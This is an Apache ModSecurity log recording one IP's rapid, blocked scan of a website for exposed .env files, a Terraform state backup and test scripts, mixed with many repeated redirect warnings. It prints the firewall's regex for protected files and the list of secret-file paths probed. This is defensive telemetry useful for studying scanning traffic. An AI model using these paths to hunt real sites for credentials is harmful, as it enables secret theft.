[Tue May 26 13:04:05.327469 2026] [security2:error] [pid 470766:tid 470916] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CVQAAFC0"]
[Tue May 26 13:04:05.339091 2026] [security2:error] [pid 470766:tid 470959] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CXwAAAD8"]
[Tue May 26 13:04:05.339606 2026] [security2:error] [pid 470766:tid 470916] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CYAAAFHw"]
[Tue May 26 13:04:05.427097 2026] [security2:error] [pid 470766:tid 470816] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/staging/.env"] [unique_id "ahVM7ejO_W1DqEcFHQ4CYwAADzE"]
[Tue May 26 13:04:05.451544 2026] [security2:error] [pid 470766:tid 470802] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/stg/.env"] [unique_id "ahVM7ejO_W1DqEcFHQ4CbgAASCM"]
[Tue May 26 13:04:05.465738 2026] [security2:error] [pid 470766:tid 470880] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/stripe/.env"] [unique_id "ahVM7ejO_W1DqEcFHQ4CdQAASHE"]
[Tue May 26 13:04:05.471988 2026] [security2:error] [pid 470766:tid 470968] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CawAASF8"]
[Tue May 26 13:04:05.477448 2026] [security2:error] [pid 470766:tid 470968] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CagAASHA"]
[Tue May 26 13:04:05.484096 2026] [security2:error] [pid 470766:tid 470968] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CbQAASEU"]
[Tue May 26 13:04:05.491572 2026] [security2:error] [pid 470766:tid 470968] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CbAAASDw"]
[Tue May 26 13:04:05.493526 2026] [security2:error] [pid 470766:tid 470807] [remote 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CcQAASCg"]
[Tue May 26 13:04:05.494659 2026] [security2:error] [pid 470766:tid 470968] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CbwAASEM"]
[Tue May 26 13:04:05.496172 2026] [security2:error] [pid 470766:tid 470968] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CcwAASCc"]
[Tue May 26 13:04:05.496525 2026] [security2:error] [pid 470766:tid 470968] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CcAAASDY"]
[Tue May 26 13:04:05.508094 2026] [security2:error] [pid 470766:tid 470968] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CeAAASAA"]
[Tue May 26 13:04:05.513874 2026] [security2:error] [pid 470766:tid 470913] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CeQAAABE"]
[Tue May 26 13:04:05.514022 2026] [security2:error] [pid 470766:tid 471013] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CegAAAHU"]
[Tue May 26 13:04:05.556729 2026] [security2:error] [pid 470766:tid 470936] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CPgAAACg"]
[Tue May 26 13:04:05.560504 2026] [security2:error] [pid 470766:tid 470897] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CggAAAAE"]
[Tue May 26 13:04:05.561071 2026] [security2:error] [pid 470766:tid 471023] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CgwAAAH8"]
[Tue May 26 13:04:05.614966 2026] [security2:error] [pid 470766:tid 470947] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4ChgAAADM"]
[Tue May 26 13:04:05.617395 2026] [security2:error] [pid 470766:tid 470811] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/terraform.tfstate.backup"] [unique_id "ahVM7ejO_W1DqEcFHQ4CjQAATSw"]
[Tue May 26 13:04:05.639310 2026] [security2:error] [pid 470766:tid 471004] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CiQAAAGw"]
[Tue May 26 13:04:05.640524 2026] [security2:error] [pid 470766:tid 470884] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/test.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4ClAAATXU"]
[Tue May 26 13:04:05.641492 2026] [security2:error] [pid 470766:tid 470803] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/test/.env"] [unique_id "ahVM7ejO_W1DqEcFHQ4ClQAATSQ"]
[Tue May 26 13:04:05.662823 2026] [security2:error] [pid 470766:tid 470973] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CkQAATTA"]
[Tue May 26 13:04:05.673030 2026] [security2:error] [pid 470766:tid 471006] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CkwAAAG4"]
[Tue May 26 13:04:05.673592 2026] [security2:error] [pid 470766:tid 470883] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/user/.env"] [unique_id "ahVM7ejO_W1DqEcFHQ4CpAAATXQ"]
[Tue May 26 13:04:05.686243 2026] [security2:error] [pid 470766:tid 470991] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CoAAAAF8"]
[Tue May 26 13:04:05.689646 2026] [security2:error] [pid 470766:tid 470969] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CnAAAAEk"]
[Tue May 26 13:04:05.690673 2026] [security2:error] [pid 470766:tid 470960] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CnwAAAEA"]
[Tue May 26 13:04:05.707281 2026] [security2:error] [pid 470766:tid 470819] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/v1/.env"] [unique_id "ahVM7ejO_W1DqEcFHQ4CqgAATTQ"]
[Tue May 26 13:04:05.714059 2026] [security2:error] [pid 470766:tid 470980] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CqAAAAFQ"]
[Tue May 26 13:04:05.718806 2026] [security2:error] [pid 470766:tid 471001] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CqQAAAGk"]
[Tue May 26 13:04:05.750346 2026] [security2:error] [pid 470766:tid 470939] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CrQAAACs"]
[Tue May 26 13:04:05.763960 2026] [security2:error] [pid 470766:tid 470843] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/v2/.env"] [unique_id "ahVM7ejO_W1DqEcFHQ4CrgAAb0w"]
[Tue May 26 13:04:05.784196 2026] [security2:error] [pid 470766:tid 470856] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/v3/.env"] [unique_id "ahVM7ejO_W1DqEcFHQ4CrwAAI1k"]
[Tue May 26 13:04:05.830456 2026] [security2:error] [pid 470766:tid 470956] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CtgAAADw"]
[Tue May 26 13:04:05.834559 2026] [security2:error] [pid 470766:tid 470992] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CtAAAYF0"]
[Tue May 26 13:04:05.839565 2026] [security2:error] [pid 470766:tid 471000] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CtQAAAGg"]
[Tue May 26 13:04:05.842412 2026] [security2:error] [pid 470766:tid 470978] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CuQAAAFI"]
[Tue May 26 13:04:05.851231 2026] [security2:error] [pid 470766:tid 471009] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CwQAAAHE"]
[Tue May 26 13:04:05.856602 2026] [security2:error] [pid 470766:tid 470992] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CxQAAYAI"]
[Tue May 26 13:04:05.860399 2026] [security2:error] [pid 470766:tid 470916] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CyQAAABQ"]
[Tue May 26 13:04:05.875658 2026] [security2:error] [pid 470766:tid 470992] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CzAAAYAc"]
[Tue May 26 13:04:05.893559 2026] [security2:error] [pid 470766:tid 470992] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4C1AAAYCI"]
[Tue May 26 13:04:05.894968 2026] [security2:error] [pid 470766:tid 470992] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4C1QAAYAw"]
[Tue May 26 13:04:05.898121 2026] [security2:error] [pid 470766:tid 470971] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4C2AAAAEs"]
[Tue May 26 13:04:05.900508 2026] [security2:error] [pid 470766:tid 470922] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4C1gAAABo"]
[Tue May 26 13:04:05.904418 2026] [security2:error] [pid 470766:tid 470994] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4C1wAAAGI"]
[Tue May 26 13:04:05.959126 2026] [security2:error] [pid 470766:tid 470992] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4C3QAAYGU"]
[Tue May 26 13:04:05.961494 2026] [security2:error] [pid 470766:tid 471023] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4C3gAAAH8"]
[Tue May 26 13:04:05.973957 2026] [security2:error] [pid 470766:tid 470993] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4C3wAAAGE"]
[Tue May 26 13:04:05.976707 2026] [security2:error] [pid 470766:tid 470853] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/var/www/.env"] [unique_id "ahVM7ejO_W1DqEcFHQ4C4gAAClY"]
[Tue May 26 13:04:05.979230 2026] [security2:error] [pid 470766:tid 470865] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/var/www/html/.env"] [unique_id "ahVM7ejO_W1DqEcFHQ4C5AAAM2I"]
[Tue May 26 13:04:06.013762 2026] [security2:error] [pid 470766:tid 470871] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/web/.env"] [unique_id "ahVM7ujO_W1DqEcFHQ4C7AAAUWg"]
[Tue May 26 13:04:06.041042 2026] [security2:error] [pid 470766:tid 470977] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4C6AAAUWc"]
[Tue May 26 13:04:06.042299 2026] [security2:error] [pid 470766:tid 470977] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4C7gAAUVM"]
[Tue May 26 13:04:06.050635 2026] [security2:error] [pid 470766:tid 470944] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4C7wAAADA"]
[Tue May 26 13:04:06.051356 2026] [security2:error] [pid 470766:tid 470977] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4C8AAAUVU"]
[Tue May 26 13:04:06.052826 2026] [security2:error] [pid 470766:tid 470977] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4C7QAAUWE"]
[Tue May 26 13:04:06.071099 2026] [security2:error] [pid 470766:tid 470977] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4C8gAAUVc"]
